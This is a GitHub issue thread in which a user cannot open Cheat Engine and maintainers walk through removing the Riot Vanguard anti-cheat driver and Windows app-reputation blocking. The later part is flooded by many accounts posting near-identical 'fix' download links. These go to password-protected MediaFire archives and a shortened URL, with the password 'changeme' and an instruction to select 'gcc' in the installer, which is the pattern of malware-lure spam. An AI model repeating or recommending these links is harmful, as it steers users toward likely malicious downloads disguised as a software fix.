### ISSUE TITLE
Unable to Open Cheat Engine

### ISSUE THREAD

**Issue by thecosmicnoble** [cheat-engine/cheat-engine#2983]
Hello, I’ve been having trouble opening Cheat Engine. Previously, I never encountered this issue. After reviewing responses given to others, I suspected that Vanguard might be the cause, so I uninstalled League of Legends, but the problem persists.

I ran the driverquery /v > bla.txt command, and here are the results: [bla.txt](https://github.com/user-attachments/files/16677553/bla.txt)

Could you please assist me with this issue? Thank you in advance.

**Comment by cheat-engine** [comment]
vgk is still running

**Comment by thecosmicnoble** [comment]
I have removed League of Legends and Riot Games files from my system, and I have restarted my computer. However, Riot Vanguard is still present. The bla.txt file I provided shows Vanguard's presence with the following line: C:\Program Files\Riot Vanguard\vgk.sys.
Link: [bla (1).txt](https://github.com/user-attachments/files/16682929/bla.1.txt)

Could you please help me understand what I might be doing wrong?

**Comment by cheat-engine** [comment]
`C:\Program Files\Riot Vanguard\vgk.sys ` still exists.  Try deleting it. Or properly uninstall it so windows doesn't restore it.
Also do not forget to restart windows.  (Do not shut down and back on, actual restart)

try this command in a admin terminal:
```
net stop vgk
sc delete vgk
```

**Comment by Sencaid** [comment]
> `C:\Program Files\Riot Vanguard\vgk.sys ` still exists. Try deleting it. Or properly uninstall it so windows doesn't restore it. Also do not forget to restart windows. (Do not shut down and back on, actual restart)
> 
> try this command in a admin terminal:
> 
> ```
> net stop vgk
> sc delete vgk
> ```

ANSWER ME!!!! @cheat-engine

**Comment by thecosmicnoble** [comment]
Thank you for the instructions. I followed them and successfully removed C:\Program Files\Riot Vanguard\vgk.sys
After running the driverquery /v > bla.txt command again, Vanguard no longer appears. [bla.txt](https://github.com/user-attachments/files/16691475/bla.txt)

However, I am still unable to open Cheat Engine. I have tried disabling all protection options in Windows Defender, but the issue persists.

Could you please advise on what might be causing this and how to resolve it?

**Comment by cheat-engine** [comment]
could be windows PUP protection.  (Different than defender)

Also, that result of driverquery seems to be incomplete

**Comment by Sencaid** [comment]
> could be windows PUP protection. (Different than defender)
> 
> Also, that result of driverquery seems to be incomplete

Answer meeeeeeeeeee

**Comment by thecosmicnoble** [comment]
I don't use any antivirus software other than Windows Defender. Occasionally, I download Malwarebytes for a scan and then uninstall it afterward. Even after disabling every protection setting in Windows Defender, Cheat Engine still won’t open. At this point, I have no idea what could be causing this or what else to try.

Here is the completed result of the driverquery command after running it again: [bla.txt](https://github.com/user-attachments/files/16708852/bla.txt)

**Comment by fade2gray** [comment]
Some Potentially Unwanted Programs/Apps can be silently blocked by ...

Windows Security  > App & Browser control > Reputation-based protection > Check apps and files

**Comment by thecosmicnoble** [comment]
I followed your instructions and disabled Reputation-based protection under Windows Security > App & Browser control > Reputation-based protection > Check apps and files. I also uninstalled Cheat Engine and reinstalled it. The installation process goes smoothly without any issues, but when I try to open the application, the loading circle appears briefly next to the mouse cursor, and then nothing happens.

**Comment by thecosmicnoble** [comment]
I followed your instructions, and the only executable that worked was "C:\Program Files\Cheat Engine 7.5\cheatengine-i386.exe"—Cheat Engine opened successfully. However, I'm not sure what makes this different from launching it through the desktop shortcut. When I try to use the speed hack with this version of Cheat Engine, I encounter the following error:
![5929141278149297378](https://github.com/user-attachments/assets/6640730a-738c-417b-8290-e826c2499ea5)

**Comment by fade2gray** [comment]
Are you running a 32bit system?

**Comment by fade2gray** [comment]
It seems you might still be affected by some anti-cheat -  https://www.cheatengine.org/forum/viewtopic.php?t=620745&sid=ff28914625c47417f618ebb44090a0d0

**Comment by thecosmicnoble** [comment]
> Are you running a 32bit system?

I am using a 64-bit system. Based on the link you provided, I have opened a help request on that forum. You can view my post [here](https://forum.cheatengine.org/viewtopic.php?p=5790837#5790837.)

Thank you for your assistance.

**Comment by thecosmicnoble** [comment]
Current situation: I can't open Cheat Engine by clicking on the desktop icon. I can only open it from **"C:\Program Files\Cheat Engine 7.5\cheatengine-i386.exe"**. However, when I do manage to open it, I can't use it functionally. When I try to use the speed hack, I encounter the following error:

_code section compilation failed:<string-0>:21: warning assignment discards qualifier from pointer target type tcc:error:undefined symbol 'getcurrentthreadid'_

Interestingly, I seem to be the second person on the internet experiencing this issue; there are no other results related to this error.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by thecosmicnoble** [comment]
Thank you to everyone who tried to help. Unfortunately, despite following all the suggestions, I haven't been able to resolve the issue. At this point, I don't see a way forward to fix this, so I’m closing this issue as 'Not Planned.' I appreciate your assistance.

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
